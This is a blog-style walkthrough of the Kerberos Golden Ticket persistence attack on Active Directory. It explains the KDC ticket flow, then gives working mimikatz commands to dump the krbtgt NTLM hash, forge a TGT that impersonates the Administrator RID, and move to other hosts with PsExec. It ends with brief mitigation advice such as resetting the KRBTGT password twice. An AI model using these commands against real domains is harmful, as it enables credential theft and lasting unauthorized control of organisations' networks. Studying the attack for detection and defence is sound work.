Its not much as privilege escalation attack . There’s more of persistence attak . its like when you have already got access to some pretty high level stuff like domain controller in the domain and in this attack we are using administrator account for demo . It will help if you have already compromised the domain its a way to keep persistence to the domain easily
How KDC works
In the Active Directory domain, every domain controller runs a KDC (Kerberos Distribution Center) service that processes all the user that requests for TGT or TGS tickets to Kerberos. AD uses the KRBTGT account in the AD domain to generate the server ticket
Step 1- /Legitimate User: Request TGT (Ticket Granting Ticket,provide user ntlm hash) to authenticate with kdc
Step 2- /Domain Controller (KDC): Gives back TGT encrypted with krbtgt hash
Step 3 - /Legititmate User: Request for TGS (Ticket Granting Server) along with TGT to request for particular server ,in this case application server
Step 4 - /Domain Controller: Gives back TGS of Application Server
Now User can Authenticate to Application server with TGS
TGT contains = Domain Name ,SID of the Domain , Domain KRBTGT Account NTLM password hash, Impersonate user
What is Domain Persistence-Golden Ticket
Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets,attacker escape the 1st & 2nd Step and initialise Since a Domain Persistence-Golden Ticket is a forged TGT, it is sent to the Domain Controller as part of the TGS-REQ to get a service ticket.communication with KCD from 3rd step.
The TGT is used mainly to inform KDC’s domain controller that another domain controller has authenticated the users. The reality is that the TGT has the hash KRBTGT password encrypted and any KDC service inside the domain may decrypt to proves it is valid.
- Inshort if we have TGT we can request for any TGS server ticket , as you can see for tgt we need krbtgt account hash . What if we have the hash of the krbtgt account it means that we can create TGT by ourself with various tools and request for TGS for any server to access any resources , any machines in the domain
Attack Demonstration
The Receipe for forging TGT:
also you can see above
Domain Name
SID of the Domain
Domain KRBTGT Account NTLM password hash
Impersonate user
In this attack we have already assumed that attacker has already compromised
DCDomain Controller
- Now we need the SID of the domain and KRBTGT ntlm hash, for that we will dump the hashes using mimikatz for the particular user i.e krbtgt
1
2
mimikatz#: lsadump::lsa /inject /user:krbtgt
KRBTGT NTLM HASH:
61bd28fa97db7369c913bee99d2aae89SID OF THE DOMAIN:
crt\administrator S-1-5-21-1011749309-1128044670-722997229-500you can also find SID of the domain using
whoami /user
Forging TGT
Now we have all the creds needed for this attack, Now lets create TGT using mimikatz
privilege::debug
1
mimikatz#: kerberos::golden /domain:crt.local /sid:S-1-5-21-1011749309-1128044670-722997229 /user:fake01 /krbtgt:61bd28fa97db7369c913bee99d2aae89 /id:500 /ptt
/user: we can use any non existing user also or Administrator account
/id: 500, its for impersonating user with RID 500 i.e belongs to Administrator Account
misc::cmd
- Now you will have one cmd poped up in which we have the ticket session created , to check type
klistas you can see we haveTGTcreated
- Now you can use psexec tool to connect to any machine in the domain , will try connecting to
client01
1
.\PsExec.exe \\client01.crt.local cmd.exe
its an awesome attack but not everyone will pick this up quite yet for example if they owned the DC you can create your own new account and make him the domain admin but if you want to be stealthier have a look on the Silver Ticket Attack
References
Mitigate Domain Persistence-Golden Ticket Attack
APPROACH 1: Reduce Domain Administrative Rights, Review membership of privileged domain groups (e.g. Domain Admins, Enterprise Admins, Server Operators) and remove unnecessary members
APPROACH 2: Enforce User Least Privilege, Rely on a least-privilege model to restrict user and domain administrator access; limit the number of administrator accounts
APPROACH 3: Routinely update the KRBTGT password twice. Changing the password twice ensures that any ticket signed with a stolen KDC key will be invalidated. The DC stores two versions of the KRBTGT password (a current and previous version), which enables the KDC to check whether an invalid TGT has a KDC key that matches a previous KRBTGT password. (The Windows Event ID 4769 will notify you if a Domain Persistence-golden ticket is submitted to a DC after the KRBTGT password was reset twice.)